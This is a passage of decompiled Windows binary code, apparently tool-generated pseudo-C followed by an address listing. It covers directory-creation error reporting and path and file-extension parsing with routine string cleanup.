																						_pop(_t1047);
																						__eflags = _v48 ^ _t1064;
																						return E012CAE19(_t1044, _t809, _v48 ^ _t1064, _t945, _t1024, _t1047);
																					} else {
																						_t840 =  *(_t809 + 8);
																						_t945 = 2 + _t945 * 2;
																						_t521 = _t840;
																						__eflags = _t945 - 0x1000;
																						if(_t945 < 0x1000) {
																							L158:
																							_push(_t945);
																							E012CAE27(_t840);
																							goto L159;
																						} else {
																							_t840 =  *(_t840 - 4);
																							_t945 = _t945 + 0x23;
																							__eflags = _t521 - _t840 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L166;
																							} else {
																								goto L158;
																							}
																						}
																					}
																				} else {
																					_t1023 = E012A88E0(_t809,  &_v168, _t1044, _t1023, _t1044);
																					_v32 = 1;
																					_t944 =  *(_t809 + 0x18);
																					_t840 = 0x7ffffffe -  *(_t809 + 0x18);
																					__eflags = 0x7ffffffe - 0xf;
																					if(0x7ffffffe < 0xf) {
																						E012A1D70(_t840);
																						goto L161;
																					} else {
																						__eflags =  *(_t809 + 0x1c) - 8;
																						_t672 =  >=  ?  *(_t809 + 8) : _t809 + 8;
																						E01299780( &_v144, _v174, _t840, L"The directory \'", 0xf,  >=  ?  *(_t809 + 8) : _t809 + 8, _t944);
																						_push(0x20);
																						_v32 = 2;
																						_t674 = E01299A40( &_v144, _t1125, L"\' could not be created because: ");
																						asm("movups xmm0, [eax]");
																						asm("movups [ebp-0x44], xmm0");
																						asm("movq xmm0, [eax+0x10]");
																						asm("movq [ebp-0x34], xmm0");
																						 *(_t674 + 0x10) = 0;
																						 *(_t674 + 0x14) = 7;
																						 *_t674 = 0;
																						_push(_t1023);
																						_v32 = 3;
																						E012A6D40(_t809,  &_v120, _t1023, _v174,  &_v96);
																						_v32 = 4;
																						_v72 = 0;
																						_v56 = 0;
																						_v52 = 7;
																						_v72 = 0;
																						E012A1EE0(_t809,  &_v72, _t944, _t1023, _t1044, L"CreateDirectoryAPIWrapper", 0x19);
																						_push(0x80000000);
																						_v32 = 5;
																						_push( &_v120);
																						_push( &_v72);
																						E012A98F0(_t809, _t1023, _t1125, 3);
																						_t981 = _v52;
																						__eflags = _t981 - 8;
																						if(_t981 < 8) {
																							L109:
																							_t982 = _v100;
																							__eflags = _t982 - 8;
																							if(_t982 < 8) {
																								L113:
																								_t983 = _v76;
																								__eflags = _t983 - 8;
																								if(_t983 < 8) {
																									L117:
																									_t984 = _v124;
																									__eflags = _t984 - 8;
																									if(_t984 < 8) {
																										L121:
																										_t985 = _v148;
																										_v128 = 0;
																										_v124 = 7;
																										_v144 = 0;
																										__eflags = _t985 - 8;
																										if(_t985 < 8) {
																											goto L125;
																										} else {
																											_t905 = _v168;
																											_t986 = 2 + _t985 * 2;
																											_t683 = _t905;
																											__eflags = _t986 - 0x1000;
																											if(_t986 < 0x1000) {
																												L124:
																												_push(_t986);
																												E012CAE27(_t905);
																												_t1092 = _t1092 + 8;
																												goto L125;
																											} else {
																												_t840 =  *(_t905 - 4);
																												_t944 = _t986 + 0x23;
																												__eflags = _t683 - _t840 + 0xfffffffc - 0x1f;
																												if(__eflags > 0) {
																													goto L161;
																												} else {
																													goto L124;
																												}
																											}
																										}
																									} else {
																										_t906 = _v144;
																										_t987 = 2 + _t984 * 2;
																										_t687 = _t906;
																										__eflags = _t987 - 0x1000;
																										if(_t987 < 0x1000) {
																											L120:
																											_push(_t987);
																											E012CAE27(_t906);
																											_t1092 = _t1092 + 8;
																											goto L121;
																										} else {
																											_t840 =  *(_t906 - 4);
																											_t944 = _t987 + 0x23;
																											__eflags = _t687 - _t840 + 0xfffffffc - 0x1f;
																											if(__eflags > 0) {
																												goto L161;
																											} else {
																												goto L120;
																											}
																										}
																									}
																								} else {
																									_t907 = _v96;
																									_t988 = 2 + _t983 * 2;
																									_t691 = _t907;
																									__eflags = _t988 - 0x1000;
																									if(_t988 < 0x1000) {
																										L116:
																										_push(_t988);
																										E012CAE27(_t907);
																										_t1092 = _t1092 + 8;
																										goto L117;
																									} else {
																										_t840 =  *(_t907 - 4);
																										_t944 = _t988 + 0x23;
																										__eflags = _t691 - _t840 + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											goto L161;
																										} else {
																											goto L116;
																										}
																									}
																								}
																							} else {
																								_t908 = _v120;
																								_t989 = 2 + _t982 * 2;
																								_t695 = _t908;
																								__eflags = _t989 - 0x1000;
																								if(_t989 < 0x1000) {
																									L112:
																									_push(_t989);
																									E012CAE27(_t908);
																									_t1092 = _t1092 + 8;
																									goto L113;
																								} else {
																									_t840 =  *(_t908 - 4);
																									_t944 = _t989 + 0x23;
																									__eflags = _t695 - _t840 + 0xfffffffc - 0x1f;
																									if(__eflags > 0) {
																										goto L161;
																									} else {
																										goto L112;
																									}
																								}
																							}
																						} else {
																							_t909 = _v72;
																							_t990 = 2 + _t981 * 2;
																							_t699 = _t909;
																							__eflags = _t990 - 0x1000;
																							if(_t990 < 0x1000) {
																								L108:
																								_push(_t990);
																								E012CAE27(_t909);
																								_t1092 = _t1092 + 8;
																								goto L109;
																							} else {
																								_t840 =  *(_t909 - 4);
																								_t944 = _t990 + 0x23;
																								__eflags = _t699 - _t840 + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									L161:
																									E012CF35F(_t809, _t840, _t944, __eflags);
																									L162:
																									E012A1D70(_t840);
																									L163:
																									E012CF35F(_t809, _t840, _t944, __eflags);
																									L164:
																									E012A1D70(_t840);
																									L165:
																									E012CF35F(_t809, _t840, _t944, __eflags);
																									L166:
																									E012CF35F(_t809, _t840, _t945, __eflags);
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									_push(_t1064);
																									_t1066 = _t1092;
																									_push(0xffffffff);
																									_push(0x12ec98d);
																									_push( *[fs:0x0]);
																									_push(_t840);
																									_push(_t809);
																									_push(_t1044);
																									_push(_t1023);
																									_t527 =  *0x1309018; // 0xedd8d3b4
																									_push(_t527 ^ _t1066);
																									_t529 =  &_v540;
																									 *[fs:0x0] = _t529;
																									_t1048 = _t840;
																									_v544 = _t1048;
																									_v544 = _t1048;
																									_v532 = 0;
																									__eflags = _v500 - 8;
																									_t1025 = _v504;
																									_t947 =  >=  ? _v520 :  &_v520;
																									_t811 = _t809 | 0xffffffff;
																									__eflags = _t1025;
																									if(_t1025 == 0) {
																										L173:
																										_t530 = _t529 | 0xffffffff;
																										__eflags = _t530;
																									} else {
																										_t348 = _t1025 - 1; // -1
																										_t615 = _t348;
																										__eflags = _t615 - _t811;
																										_t883 =  <  ? _t615 : _t811;
																										__eflags =  *(_t947 + _t883 * 2) - 0x5c;
																										_t529 = _t947 + _t883 * 2;
																										if( *(_t947 + _t883 * 2) == 0x5c) {
																											L172:
																											_t530 = _t529 - _t947 >> 1;
																										} else {
																											while(1) {
																												__eflags = _t529 - _t947;
																												if(_t529 == _t947) {
																													goto L173;
																												}
																												_t529 = _t529 - 2;
																												__eflags =  *_t529 - 0x5c;
																												if( *_t529 != 0x5c) {
																													continue;
																												} else {
																													goto L172;
																												}
																												goto L174;
																											}
																											goto L173;
																										}
																									}
																									L174:
																									_t353 = _t530 + 1; // 0x0
																									_t841 = _t353;
																									 *_t1048 = 0;
																									_t1048[0x10] = 0;
																									_t1048[0x14] = 7;
																									 *_t1048 = 0;
																									__eflags = _t1025 - _t841;
																									if(__eflags < 0) {
																										E012986E0(_t841, __eflags);
																										goto L181;
																									} else {
																										_t1025 = _t1025 - _t841;
																										__eflags = _t1025 - 0xffffffff;
																										_t811 =  <  ? _t1025 : _t811;
																										__eflags = _v4 - 8;
																										_t607 =  >=  ? _v24 :  &_v24;
																										E012A1EE0(_t811, _t1048, _t947, _t1025, _t1048, ( >=  ? _v24 :  &_v24) + _t841 * 2, _t811);
																										_t966 = _v4;
																										__eflags = _t966 - 8;
																										if(_t966 < 8) {
																											L179:
																											 *[fs:0x0] = _v44;
																											return _t1048;
																										} else {
																											_t881 = _v24;
																											_t967 = 2 + _t966 * 2;
																											_t611 = _t881;
																											__eflags = _t967 - 0x1000;
																											if(_t967 < 0x1000) {
																												L178:
																												_push(_t967);
																												E012CAE27(_t881);
																												goto L179;
																											} else {
																												_t841 =  *(_t881 - 4);
																												_t947 = _t967 + 0x23;
																												__eflags = _t611 - _t841 + 0xfffffffc - 0x1f;
																												if(__eflags > 0) {
																													L181:
																													E012CF35F(_t811, _t841, _t947, __eflags);
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													_push(_t1066);
																													_t1067 = _t1092;
																													_push(0xffffffff);
																													_push(0x12ea84d);
																													_push( *[fs:0x0]);
																													_push(_t841);
																													_push(_t1048);
																													_push(_t1025);
																													_t535 =  *0x1309018; // 0xedd8d3b4
																													_push(_t535 ^ _t1067);
																													_t537 =  &_v573;
																													 *[fs:0x0] = _t537;
																													_t1049 = _t841;
																													_v577 = _t1049;
																													_v577 = _t1049;
																													_v565 = 0;
																													__eflags = _v533 - 8;
																													_t1026 = _v537;
																													_t949 =  >=  ? _v553 :  &_v553;
																													__eflags = _t1026;
																													if(_t1026 == 0) {
																														L188:
																														_t842 = _t841 | 0xffffffff;
																														__eflags = _t842;
																													} else {
																														_t875 = _t841 | 0xffffffff;
																														_t375 = _t1026 - 1; // -1
																														_t537 = _t375;
																														__eflags = _t537 - _t875;
																														_t876 =  <  ? _t537 : _t875;
																														__eflags =  *(_t949 + _t876 * 2) - 0x2e;
																														_t841 = _t949 + _t876 * 2;
																														if( *(_t949 + _t876 * 2) == 0x2e) {
																															L187:
																															_t842 = _t841 - _t949 >> 1;
																														} else {
																															while(1) {
																																__eflags = _t841 - _t949;
																																if(_t841 == _t949) {
																																	goto L188;
																																}
																																_t841 = _t841 - 2;
																																__eflags =  *_t841 - 0x2e;
																																if( *_t841 != 0x2e) {
																																	continue;
																																} else {
																																	goto L187;
																																}
																																goto L189;
																															}
																															goto L188;
																														}
																													}
																													L189:
																													__eflags = _v8 - 8;
																													_t951 =  >=  ? _v28 :  &_v28;
																													__eflags = _t1026;
																													if(_t1026 == 0) {
																														L194:
																														_t538 = _t537 | 0xffffffff;
																														__eflags = _t538;
																													} else {
																														_t383 = _t1026 - 1; // -1
																														_t603 = _t383;
																														__eflags = _t603 - 0xffffffff;
																														_t1037 =  <  ? _t603 : 0xffffffff;
																														_t604 =  <  ? _t603 : 0xffffffff;
																														_t1026 = _v12;
																														__eflags =  *(_t951 + _t604 * 2) - 0x5c;
																														_t537 = _t951 + _t604 * 2;
																														if( *(_t951 + _t604 * 2) == 0x5c) {
																															L193:
																															_t538 = _t537 - _t951 >> 1;
																														} else {
																															while(1) {
																																__eflags = _t537 - _t951;
																																if(_t537 == _t951) {
																																	goto L194;
																																}
																																_t537 = _t537 - 2;
																																__eflags =  *_t537 - 0x5c;
																																if( *_t537 != 0x5c) {
																																	continue;
																																} else {
																																	goto L193;
																																}
																																goto L195;
																															}
																															goto L194;
																														}
																													}
																													L195:
																													__eflags = _t842 - 0xffffffff;
																													if(_t842 == 0xffffffff) {
																														L201:
																														asm("movups xmm0, [ebp+0x8]");
																														 *_t1049 = 0;
																														 *(_t1049 + 0x10) = 0;
																														 *(_t1049 + 0x14) = 0;
																														asm("movups [esi], xmm0");
																														asm("movq xmm0, [ebp+0x18]");
																														asm("movq [esi+0x10], xmm0");
																														goto L202;
																													} else {
																														__eflags = _t842 - _t538;
																														if(_t842 <= _t538) {
																															goto L201;
																														} else {
																															 *_t1049 = 0;
																															__eflags = _t1026 - _t842;
																															 *(_t1049 + 0x10) = 0;
																															 *(_t1049 + 0x14) = 7;
																															_t845 =  <  ? _t1026 : _t842;
																															 *_t1049 = 0;
																															__eflags = _v8 - 8;
																															_t542 =  >=  ? _v28 :  &_v28;
																															E012A1EE0(_t811, _t1049, _t951, _t1026, _t1049,  >=  ? _v28 :  &_v28,  <  ? _t1026 : _t842);
																															_t952 = _v8;
																															__eflags = _t952 - 8;
																															if(_t952 < 8) {
																																L202:
																																 *[fs:0x0] = _v48;
																																return _t1049;
																															} else {
																																_t847 = _v28;
																																_t953 = 2 + _t952 * 2;
																																_t544 = _t847;
																																__eflags = _t953 - 0x1000;
																																if(_t953 < 0x1000) {
																																	L200:
																																	_push(_t953);
																																	E012CAE27(_t847);
																																	 *[fs:0x0] = _v48;
																																	return _t1049;
																																} else {
																																	_t847 =  *(_t847 - 4);
																																	_t953 = _t953 + 0x23;
																																	__eflags = _t544 - _t847 + 0xfffffffc - 0x1f;
																																	if(__eflags > 0) {
																																		E012CF35F(_t811, _t847, _t953, __eflags);
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		_push(_t1067);
																																		_t1070 = _t1092;
																																		_push(0xffffffff);
																																		_push(0x12ec98d);
																																		_push( *[fs:0x0]);
																																		_push(_t847);
																																		_push(_t811);
																																		_push(_t1049);
																																		_push(_t1026);
																																		_t551 =  *0x1309018; // 0xedd8d3b4
																																		_push(_t551 ^ _t1070);
																																		_t553 =  &_v605;
																																		 *[fs:0x0] = _t553;
																																		_t1052 = _t847;
																																		_v609 = _t1052;
																																		_v609 = _t1052;
																																		_v597 = 0;
																																		__eflags = _v565 - 8;
																																		_t812 = _v569;
																																		_t1030 =  >=  ? _v585 :  &_v585;
																																		__eflags = _t812;
																																		if(_t812 == 0) {
																																			L210:
																																			_t954 = _t953 | 0xffffffff;
																																			__eflags = _t954;
																																		} else {
																																			_t874 = _t847 | 0xffffffff;
																																			_t411 = _t812 - 1; // -1
																																			_t553 = _t411;
																																			__eflags = _t553 - _t874;
																																			_t853 =  <  ? _t553 : _t874;
																																			__eflags =  *(_t1030 + _t853 * 2) - 0x2e;
																																			_t953 = _t1030 + _t853 * 2;
																																			if( *(_t1030 + _t853 * 2) == 0x2e) {
																																				L209:
																																				_t954 = _t953 - _t1030 >> 1;
																																			} else {
																																				while(1) {
																																					__eflags = _t953 - _t1030;
																																					if(_t953 == _t1030) {
																																						goto L210;
																																					}
																																					_t953 = _t953 - 2;
																																					__eflags =  *_t953 - 0x2e;
																																					if( *_t953 != 0x2e) {
																																						continue;
																																					} else {
																																						goto L209;
																																					}
																																					goto L211;
																																				}
																																				goto L210;
																																			}
																																		}
																																		L211:
																																		__eflags = _v12 - 8;
																																		_t1032 =  >=  ? _v32 :  &_v32;
																																		__eflags = _t812;
																																		if(_t812 == 0) {
																																			L217:
																																			_t554 = _t553 | 0xffffffff;
																																			__eflags = _t554;
																																		} else {
																																			_t419 = _t812 - 1; // -1
																																			_t601 = _t419;
																																			_t873 = _t847 | 0xffffffff;
																																			__eflags = _t601 - _t873;
																																			_t853 =  <  ? _t601 : _t873;
																																			__eflags =  *(_t1032 + _t853 * 2) - 0x5c;
																																			_t553 = _t1032 + _t853 * 2;
																																			if( *(_t1032 + _t853 * 2) == 0x5c) {
																																				L216:
																																				_t554 = _t553 - _t1032 >> 1;
																																			} else {
																																				asm("o16 nop [eax+eax]");
																																				while(1) {
																																					__eflags = _t553 - _t1032;
																																					if(_t553 == _t1032) {
																																						goto L217;
																																					}
																																					_t553 = _t553 - 2;
																																					__eflags =  *_t553 - 0x5c;
																																					if( *_t553 != 0x5c) {
																																						continue;
																																					} else {
																																						goto L216;
																																					}
																																					goto L218;
																																				}
																																				goto L217;
																																			}
																																		}
																																		L218:
																																		__eflags = _t954 - 0xffffffff;
																																		if(_t954 == 0xffffffff) {
																																			L226:
																																			 *_t1052 = 0;
																																			 *(_t1052 + 0x10) = 0;
																																			 *(_t1052 + 0x14) = 7;
																																			 *_t1052 = 0;
																																			E012A1EE0(_t812, _t1052, _t954, _t1032, _t1052, 0x12f983c, 0);
																																			_t955 = _v12;
																																			__eflags = _t955 - 8;
																																			if(_t955 < 8) {
																																				goto L225;
																																			} else {
																																				_t853 = _v32;
																																				_t956 = 2 + _t955 * 2;
																																				_t558 = _t853;
																																				__eflags = _t956 - 0x1000;
																																				if(_t956 < 0x1000) {
																																					goto L224;
																																				} else {
																																					_t853 =  *(_t853 - 4);
																																					_t956 = _t956 + 0x23;
																																					__eflags = _t558 - _t853 + 0xfffffffc - 0x1f;
																																					if(__eflags <= 0) {
																																						goto L224;
																																					} else {
																																						goto L229;
																																					}
																																				}
																																			}
																																		} else {
																																			__eflags = _t954 - _t554;
																																			if(_t954 <= _t554) {
																																				goto L226;
																																			} else {
																																				_t963 = _t954 + 1;
																																				 *_t1052 = 0;
																																				 *(_t1052 + 0x10) = 0;
																																				 *(_t1052 + 0x14) = 7;
																																				 *_t1052 = 0;
																																				__eflags = _t812 - _t963;
																																				if(__eflags < 0) {
																																					L230:
																																					E012986E0(_t853, __eflags);
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					_push(_t1070);
																																					_t1072 = _t1092;
																																					_push(0xffffffff);
																																					_t565 =  *0x1309018; // 0xedd8d3b4
																																					 *[fs:0x0] =  &_v638;
																																					_t1054 = _t853;
																																					_v642 = _t1054;
																																					_v642 = _t1054;
																																					_t1102 = _t1092 - 0xfffffffffffffff4;
																																					_v630 = 0;
																																					_v642 = _t1102;
																																					_v646 = "\\";
																																					_v642 = 0x12fc3e6;
																																					E0129A2D0(_t1102,  &_v646);
																																					_t855 =  &_v618;
																																					E012A8E30(_t812, _t855, _t565 ^ _t1092, _t1032, _t1052,  *[fs:0x0], 0x12ec98d);
																																					_t1034 = _v602;
																																					_t1103 = _t1102 + 0x14;
																																					__eflags = _v598 - 8;
																																					_t958 =  >=  ? _v618 :  &_v618;
																																					__eflags = _t1034;
																																					if(_t1034 == 0) {
																																						L242:
																																						 *_t1054 = 0;
																																						 *(_t1054 + 0x10) = 0;
																																						 *(_t1054 + 0x14) = 7;
																																						 *_t1054 = 0;
																																						E012A1EE0(_t812, _t1054, _t958, _t1034, _t1054, 0x12f983c, 0);
																																						_t959 = _v16;
																																						__eflags = _t959 - 8;
																																						if(_t959 < 8) {
																																							goto L241;
																																						} else {
																																							_t859 = _v36;
																																							_t960 = 2 + _t959 * 2;
																																							_t574 = _t859;
																																							__eflags = _t960 - 0x1000;
																																							if(_t960 < 0x1000) {
																																								goto L240;
																																							} else {
																																								_t859 =  *(_t859 - 4);
																																								_t960 = _t960 + 0x23;
																																								__eflags = _t574 - _t859 + 0xfffffffc - 0x1f;
																																								if(__eflags <= 0) {
																																									goto L240;
																																								} else {
																																									goto L245;
																																								}
																																							}
																																						}
																																					} else {
																																						_t863 = _t855 | 0xffffffff;
																																						_t585 = _t1034 - 1;
																																						__eflags = _t585 - _t863;
																																						_t864 =  <  ? _t585 : _t863;
																																						__eflags =  *((short*)(_t958 + _t864 * 2)) - 0x5c;
																																						_t865 = _t958 + _t864 * 2;
																																						if( *((short*)(_t958 + _t864 * 2)) == 0x5c) {
																																							L236:
																																							_t867 = _t865 - _t958 >> 1;
																																							__eflags = _t867 - 0xffffffff;
																																							if(_t867 == 0xffffffff) {
																																								goto L242;
																																							} else {
																																								 *_t1054 = 0;
																																								__eflags = _t1034 - _t867;
																																								 *(_t1054 + 0x10) = 0;
																																								 *(_t1054 + 0x14) = 7;
																																								_t868 =  <  ? _t1034 : _t867;
																																								 *_t1054 = 0;
																																								__eflags = _v16 - 8;
																																								_t588 =  >=  ? _v36 :  &_v36;
																																								E012A1EE0(_t812, _t1054, _t958, _t1034, _t1054,  >=  ? _v36 :  &_v36,  <  ? _t1034 : _t867);
																																								_t962 = _v16;
																																								__eflags = _t962 - 8;
																																								if(_t962 < 8) {
																																									L241:
																																									 *[fs:0x0] = _v56;
																																									return _t1054;
																																								} else {
																																									_t859 = _v36;
																																									_t960 = 2 + _t962 * 2;
																																									_t590 = _t859;
																																									__eflags = _t960 - 0x1000;
																																									if(_t960 < 0x1000) {
																																										L240:
																																										_push(_t960);
																																										E012CAE27(_t859);
																																										goto L241;
																																									} else {
																																										_t859 =  *(_t859 - 4);
																																										_t960 = _t960 + 0x23;
																																										__eflags = _t590 - _t859 + 0xfffffffc - 0x1f;
																																										if(__eflags > 0) {
																																											L245:
																																											E012CF35F(_t812, _t859, _t960, __eflags);
																																											asm("int3");
																																											asm("int3");
																																											asm("int3");
																																											asm("int3");
																																											_v666 = 0;
																																											E012983B0(_t1103 - 0xfffffffffffffff4, _t859);
																																											_t581 = L012C4290( &_v666, 0, _t1034, _t1054, _t1125, 0, _t812, _t1072);
																																											__eflags = _t581;
																																											if(_t581 != 0) {
																																												return 0;
																																											} else {
																																												__eflags = _v52 & 0x00000010;
																																												_t584 =  !=  ? 1 : 0;
																																												return  !=  ? 1 : 0;
																																											}
																																										} else {
																																											goto L240;
																																										}
																																									}
																																								}
																																							}
																																						} else {
																																							while(1) {
																																								__eflags = _t865 - _t958;
																																								if(_t865 == _t958) {
																																									goto L242;
																																								}
																																								_t865 = _t865 - 2;
																																								__eflags =  *_t865 - 0x5c;
																																								if( *_t865 != 0x5c) {
																																									continue;
																																								} else {
																																									goto L236;
																																								}
																																								goto L249;
																																							}
																																							goto L242;
																																						}
																																					}
																																				} else {
																																					_t812 = _t812 - _t963;
																																					__eflags = _t812 - 0xffffffff;
																																					_t871 =  <  ? _t812 : 0xffffffff;
																																					__eflags = _v12 - 8;
																																					_t595 =  >=  ? _v32 :  &_v32;
																																					E012A1EE0(_t812, _t1052, _t963, _t1032, _t1052, ( >=  ? _v32 :  &_v32) + _t963 * 2,  <  ? _t812 : 0xffffffff);
																																					_t964 = _v12;
																																					__eflags = _t964 - 8;
																																					if(_t964 < 8) {
																																						L225:
																																						 *[fs:0x0] = _v52;
																																						return _t1052;
																																					} else {
																																						_t853 = _v32;
																																						_t956 = 2 + _t964 * 2;
																																						_t598 = _t853;
																																						__eflags = _t956 - 0x1000;
																																						if(_t956 < 0x1000) {
																																							L224:
																																							_push(_t956);
																																							E012CAE27(_t853);
																																							goto L225;
																																						} else {
																																							_t853 =  *(_t853 - 4);
																																							_t956 = _t956 + 0x23;
																																							__eflags = _t598 - _t853 + 0xfffffffc - 0x1f;
																																							if(__eflags > 0) {
																																								L229:
																																								E012CF35F(_t812, _t853, _t956, __eflags);
																																								goto L230;
																																							} else {
																																								goto L224;
																																							}
																																						}
																																					}
																																				}
																																			}
																																		}
																																	} else {
																																		goto L200;
																																	}
																																}
																															}
																														}
																													}
																												} else {
																													goto L178;
																												}
																											}
																										}
																									}
																								} else {
																									goto L108;
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																} else {
																	goto L93;
																}
															}
														}
													}
												} else {
													goto L15;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L249:
			}


















































































































































































































































































































              0x012c4900
              0x012c4900
              0x012c4901
              0x012c4903
              0x012c4905
              0x012c4910
              0x012c4911
              0x012c4917
              0x012c491c
              0x012c491e
              0x012c4921
              0x012c4922
              0x012c4923
              0x012c4927
              0x012c492d
              0x012c492f
              0x012c4931
              0x012c493a
              0x012c4bc7
              0x00000000
              0x012c4948
              0x012c4948
              0x012c494e
              0x012c4953
              0x012c4955
              0x012c4955
              0x012c4958
              0x012c495b
              0x012c495b
              0x012c4963
              0x012c4970
              0x012c4975
              0x012c497b
              0x012c4980
              0x012c499a
              0x012c499a
              0x00000000
              0x012c4982
              0x012c4988
              0x012c498d
              0x012c4998
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c49a1
              0x012c49a1
              0x012c49a1
              0x012c49a3
              0x012c4bcc
              0x012c4bcc
              0x012c4bd2
              0x012c4c02
              0x012c4c07
              0x012c4c0f
              0x012c4c10
              0x012c4c1e
              0x012c4bd4
              0x012c4bd4
              0x012c4bd7
              0x012c4bde
              0x012c4be6
              0x012c4bf8
              0x012c4bf8
              0x012c4bfa
              0x00000000
              0x012c4be8
              0x012c4be8
              0x012c4beb
              0x012c4bf6
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c4bf6
              0x012c4be6
              0x012c49a9
              0x012c49a9
              0x012c49ad
              0x00000000
              0x012c49b3
              0x012c49c0
              0x012c49c2
              0x012c49cb
              0x012c49ce
              0x012c49d0
              0x012c49d3
              0x012c4c1f
              0x00000000
              0x012c49d9
              0x012c49d9
              0x012c49e1
              0x012c49f7
              0x012c49fc
              0x012c4a06
              0x012c4a0a
              0x012c4a11
              0x012c4a14
              0x012c4a18
              0x012c4a1d
              0x012c4a22
              0x012c4a29
              0x012c4a30
              0x012c4a33
              0x012c4a37
              0x012c4a45
              0x012c4a4a
              0x012c4a55
              0x012c4a61
              0x012c4a68
              0x012c4a6f
              0x012c4a73
              0x012c4a78
              0x012c4a80
              0x012c4a84
              0x012c4a88
              0x012c4a8b
              0x012c4a90
              0x012c4a93
              0x012c4a96
              0x012c4aca
              0x012c4aca
              0x012c4acd
              0x012c4ad0
              0x012c4b04
              0x012c4b04
              0x012c4b07
              0x012c4b0a
              0x012c4b3e
              0x012c4b3e
              0x012c4b41
              0x012c4b44
              0x012c4b78
              0x012c4b78
              0x012c4b7d
              0x012c4b84
              0x012c4b8b
              0x012c4b8f
              0x012c4b92
              0x00000000
              0x012c4b94
              0x012c4b94
              0x012c4b9a
              0x012c4ba1
              0x012c4ba3
              0x012c4ba9
              0x012c4bbb
              0x012c4bbb
              0x012c4bbd
              0x012c4bc2
              0x00000000
              0x012c4bab
              0x012c4bab
              0x012c4bae
              0x012c4bb6
              0x012c4bb9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c4bb9
              0x012c4ba9
              0x012c4b46
              0x012c4b46
              0x012c4b49
              0x012c4b50
              0x012c4b52
              0x012c4b58
              0x012c4b6e
              0x012c4b6e
              0x012c4b70
              0x012c4b75
              0x00000000
              0x012c4b5a
              0x012c4b5a
              0x012c4b5d
              0x012c4b65
              0x012c4b68
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c4b68
              0x012c4b58
              0x012c4b0c
              0x012c4b0c
              0x012c4b0f
              0x012c4b16
              0x012c4b18
              0x012c4b1e
              0x012c4b34
              0x012c4b34
              0x012c4b36
              0x012c4b3b
              0x00000000
              0x012c4b20
              0x012c4b20
              0x012c4b23
              0x012c4b2b
              0x012c4b2e
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c4b2e
              0x012c4b1e
              0x012c4ad2
              0x012c4ad2
              0x012c4ad5
              0x012c4adc
              0x012c4ade
              0x012c4ae4
              0x012c4afa
              0x012c4afa
              0x012c4afc
              0x012c4b01
              0x00000000
              0x012c4ae6
              0x012c4ae6
              0x012c4ae9
              0x012c4af1
              0x012c4af4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c4af4
              0x012c4ae4
              0x012c4a98
              0x012c4a98
              0x012c4a9b
              0x012c4aa2
              0x012c4aa4
              0x012c4aaa
              0x012c4ac0
              0x012c4ac0
              0x012c4ac2
              0x012c4ac7
              0x00000000
              0x012c4aac
              0x012c4aac
              0x012c4aaf
              0x012c4ab7
              0x012c4aba
              0x012c4c24
              0x012c4c24
              0x012c4c29
              0x012c4c29
              0x012c4c2e
              0x012c4c2f
              0x012c4c30
              0x012c4c31
              0x012c4c39
              0x012c4c3c
              0x012c4c40
              0x012c4c44
              0x012c4c46
              0x012c4c48
              0x012c4c53
              0x012c4c54
              0x012c4c55
              0x012c4c5b
              0x012c4c60
              0x012c4c62
              0x012c4c65
              0x012c4c66
              0x012c4c67
              0x012c4c6b
              0x012c4c71
              0x012c4c77
              0x012c4c79
              0x012c4c82
              0x012c4c85
              0x012c4c88
              0x012c4c91
              0x012c4c9a
              0x012c4ca3
              0x012c4ca9
              0x012c4caf
              0x012c4cb6
              0x012c4cb8
              0x012c4cba
              0x012c4cba
              0x012c4cbd
              0x012c4cbf
              0x012c4ccc
              0x012c4cd7
              0x012c4ce4
              0x012c4cfc
              0x012c4d08
              0x012c4d0a
              0x012c4d0d
              0x012c50b9
              0x012c50bb
              0x012c50bd
              0x012c50bf
              0x012c50c5
              0x012c50c8
              0x012c50d9
              0x012c50d9
              0x012c50ca
              0x012c50ca
              0x012c50cd
              0x012c50cf
              0x012c50d5
              0x012c50d7
              0x00000000
              0x00000000
              0x012c50d7
              0x012c50cd
              0x012c50c8
              0x00000000
              0x012c4d13
              0x012c4d19
              0x012c4d1b
              0x012c4d1e
              0x012c4d29
              0x012c4d29
              0x012c4d2d
              0x00000000
              0x012c4d33
              0x012c4d33
              0x012c4d35
              0x012c4d39
              0x00000000
              0x012c4d3f
              0x012c4d3f
              0x012c4d49
              0x012c4d4c
              0x012c5132
              0x00000000
              0x012c4d52
              0x012c4d52
              0x012c4d5a
              0x012c4d70
              0x012c4d75
              0x012c4d7f
              0x012c4d83
              0x012c4d8a
              0x012c4d8d
              0x012c4d91
              0x012c4d96
              0x012c4d9b
              0x012c4d9e
              0x012c4da5
              0x012c4da8
              0x012c4dae
              0x012c4db3
              0x012c4dbe
              0x012c4dc5
              0x012c4dc9
              0x012c4dce
              0x012c4dd6
              0x012c4dda
              0x012c4dde
              0x012c4de1
              0x012c4de6
              0x012c4de9
              0x012c4dec
              0x012c4e20
              0x012c4e20
              0x012c4e23
              0x012c4e26
              0x012c4e5a
              0x012c4e5a
              0x012c4e5d
              0x012c4e60
              0x00000000
              0x012c4e66
              0x012c4e66
              0x012c4e69
              0x012c4e70
              0x012c4e72
              0x012c4e78
              0x00000000
              0x012c4e7e
              0x012c4e7e
              0x012c4e81
              0x012c4e89
              0x012c4e8c
              0x00000000
              0x012c4e92
              0x00000000
              0x012c4e92
              0x012c4e8c
              0x012c4e78
              0x012c4e28
              0x012c4e28
              0x012c4e2b
